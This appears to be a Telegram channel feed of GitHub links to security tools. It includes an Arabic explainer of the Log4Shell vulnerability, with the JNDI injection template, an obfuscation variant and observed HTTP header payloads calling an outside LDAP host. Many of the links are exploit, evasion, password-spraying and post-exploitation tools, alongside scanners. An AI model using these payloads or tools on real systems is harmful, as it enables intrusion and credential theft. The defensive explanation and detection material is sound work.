Real profit
2.87K subscribers
107 photos
4 videos
155 files
3.37K links
Just invest your time
Download Telegram
A script that checks for vulnerable Log4j systems using injection of the payload in common HTTP headers
https://github.com/NorthwaveSecurity/log4jcheck

log4j rce test environment and poc
https://github.com/leonjza/log4jpwn

Find log4j on some places
https://github.com/perryflynn/find-log4j

check whether one of your applications is affected by a bug Log4Shell
https://github.com/alexbakker/log4shell-tools
Python implementation for #CVE-2021-42278 Active Directory Privilege Escalation
https://github.com/ly4k/Pachine
make use of a filesystem #bug for the #Playstation_4 on #firmware 9.00 to allow jailbreaking and kernel-level modifications to the system
https://github.com/ChendoChap/pOOBs4
explore Javascript Prototype Pollution
https://youtube.com/watch?v=XS_UMqQalLI&feature
ثغرة Log4Shell
الأسبوع الماضي تم طرح الإصدار 2.15 من أداة التسجيل Log4j لمعالجة ثغرة CVE-2021-44228 حيث تم إلغاء اتاحة جانب واحد فقط من وظائف استرجاع الرسائل في JNDI ثم تبين أنه لا يزال من الممكن استغلال الإصدار 2.15 من خلال تكوينات معينة ولكن تم حجب التفاصيل الفنية الإضافية للخطأ لمنع المزيد من الاستغلال
_ أقرت شركة Apache بالخطأ مرة أخرى ولذلك قامت بتعطيل كافة دعم JNDI بشكل افتراضي وإزالة معالجة البحث عن الرسائل تماما وقامت بإصدار الإصلاح الثاني Log4j 2.16 لمعالجة الخطأ الذي تم تعيينه كـ CVE-2021-45046

كيف تعمل ثغرة Log4Shell ..؟
بدايةً ما هو Log4j و JNDI ..؟
Log4j
مكتبة Java بمثابة أداة مساعدة تستخدم على نطاق واسع في برامج Java لتسجيل رسائل الخطأ في التطبيقات وتستخدم أيضا في خدمات cloud computing

JNDI
واجهة برمجة تطبيقات Java APIs تستخدمها Log4j لاسترداد العناصر والكائنات من وحدات الخدمة البعيدة ويمكن له الاستفادة من من العديد من واجهات الدليل بما في ذلك واجهة بروتوكول الوصول الخفيف إلى الدليل LDAP ونظام اسماء المجال (DNS) وبروتوكول (IIOP)

سبب الخلل
عند تشغيل ميزة استبدال البحث عن الرسائل ستكتشف Log4j السلاسل التي تشير إلى موارد JNDI في مصادر التكوين ورسائل السجل والمعاملات التي تم تمريرها بواسطة التطبيقات، ونظرا لأن Log4j لا يقوم بالتحقق من عناوين url التي تم إرسالها في هذه السلاسل يمكن للمهاجم إنشاء طلبات ضارة للتطبيقات التي تستخدم Log4j باستبدال الرسائل في الحقول التي تحتوي على عناوين url بخوادم ضارة
على سبيل المثال في تطبيقات الويب نظرا لأنه يتم تسجيل طلبات HTTP بشكل متكرر فإن متجه الهجوم الشائع هو وضع السلسلة الضارة في عنوان url لطلب HTTP أو رأس HTTP يتم تسجيله بشكل متكرر
مثل:
 ${jndi:[protocol]://[remote server and code address]}
يتم عرض عنوان url الذي قام المهاجم بتعيينه كبيانات عنصر Java وبعدها يتم تحميل البيانات من هذا العنوان إذا كان متصلا بالإنترنت وبإدخال سلسلة يتم تسجيلها يمكن للمهاجم تحميل وتنفيذ تعليمات برمجية ضارة مستضافة على عنوان url عام يتم تنفيذها تلقائيا في الذاكرة
يوجد مجموعة متنوعة من أشكال التعتيم تُستخدم لمنع اكتشاف الفحص أو الاستغلال مثل:
($ {$ {:: - j} $ {:: - n} $ {:: - d} $ {:: - I}) 
بعض رؤوس HTTP التي لاحظها الباحثون في طلب GET 
referer=${jndi:ldap://[redacted].interact.sh}
x-http-host-override=${jndi:ldap://[redacted].interact.sh}
true-client-ip=${jndi:ldap://[redacted].interact.sh}
x-forwarded-port=443, x-client-ip=${jndi:ldap://[redacted].interact.sh}
cf-connecting_ip=${jndi:ldap://[redacted].interact.sh}
x-forwarded-host=${jndi:ldap://[redacted].interact.sh}
contact=${jndi:ldap://[redacted].interact.sh}

لاحظ الباحثون أيضا تحول المهاجمين إلى واجهة برمجة تطبيقات RMI بدلا من واجهة بروتوكول LDAP

Log4j 2.16.0 _ CVE-2021-45046
https://logging.apache.org/log4j/2.x/security.html

لفحص ثغرات Log4Shell وإصلاحها بما في ذلك log4j 2.15.0 المصنفة CVE-2021-45046
https://github.com/logpresso/CVE-2021-44228-Scanner

Find vulnerable Log4j2 versions on disk and also inside Java Archive Files
https://github.com/fox-it/log4j-finder
generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server
https://github.com/welk1n/JNDI-Injection-Exploit

A malicious LDAP server for JNDI injection attacks
https://github.com/veracode-research/rogue-jndi
Collection of Windows usermode exploits targeting various third-party software applications
https://github.com/FULLSHADE/OSCE

A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses
https://github.com/FULLSHADE/Jektor

Escalate from a low-integrity Administrator account to NT AUTHORITY\SYSTEM without an LPE exploit by combining a COM UAC bypass and Token Impersonation
https://github.com/FULLSHADE/Auto-Elevate
An Awesome List of Log4Shell resources to help you stay informed and secure
https://github.com/snyk-labs/awesome-log4shell

parsing RMI and LDAP protocol implementation
https://github.com/EmYiQing/JNDIScan
Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries
https://github.com/cyberstruggle/L4sh

Log4j Scanner coded in Powershell
https://github.com/Maelstromage/Log4jSherlock

open detection and scanning tool for discovering and fuzzing for Log4J RCE
https://github.com/TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit

CVE-2021-22005 vulnerability which exists in the analysis service of vCenter Server
https://github.com/shmilylty/cve-2021-22005-exp

Windows Common Log File System Driver poc
https://github.com/KaLendsi/CVE-2021-43224-POC
evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)
https://github.com/0xsp-SRD/mortar

This program is designed to demonstrate various process injection techniques
https://github.com/3xpl01tc0d3r/ProcessInjection
Ghost Framework is an Android post-exploitation framework that exploits the Android Debug Bridge to remotely access an Android device
https://github.com/EntySec/ghost

linux post-exploitation framework made by linux user
https://github.com/jm33-m0/emp3r0r
Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD)
https://github.com/MarkoH17/Spray365

AD_Enum is a pentesting tool that allows to find misconfiguration through the the protocol LDAP and exploit some of those weaknesses with kerberos
https://github.com/SecuProject/ADenum
Android Reverse-Engineering Workbench for VS Code
https://github.com/APKLab/APKLab

Scanning APK file for URIs, endpoints & secrets
https://github.com/dwisiswant0/apkleaks
Overlord provides a python-based console CLI which is used to build Red Teaming infrastructure in an automated way
https://github.com/qsecure-labs/overlord

Web Cache Vulnerability Scanner is a Go-based CLI tool for testing for web cache poisoning
https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
a recon tool that allows searching on URLs that are exposed via shortener services
https://github.com/utkusen/urlhunter

This tool is design to find admin panel of any website by using custom wordlist or default wordlist easily and allow you to find admin panel trough a proxy server
https://github.com/alienwhatever/Admin-Scanner
Penetration Testing and Hacking CTF's Swiss Army Knife with: Reverse Shell Handling - Encoding/Decoding - Encryption/Decryption - Cracking Hashes / Hashing
https://github.com/helich0pper/Karkinos

simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows
https://github.com/cube0x0/SharpMapExec
This tool is used to solve scenarios such as Fastjson, log4j2, native JNDI injection and other scenarios
https://github.com/exp1orer/JNDI-Inject-Exploit

A fully automated, reliable, super-fast, mass scanning and validation toolkit for the Log4J RCE vulnerability
https://github.com/0xInfection/LogMePwn
Gosint is a distributed asset information collection and vulnerability scanning platform
https://github.com/1in9e/gosint

VPN Overall Reconnaissance
Testing Enumeration and Exploitation Toolkit
https://github.com/klezVirus/vortex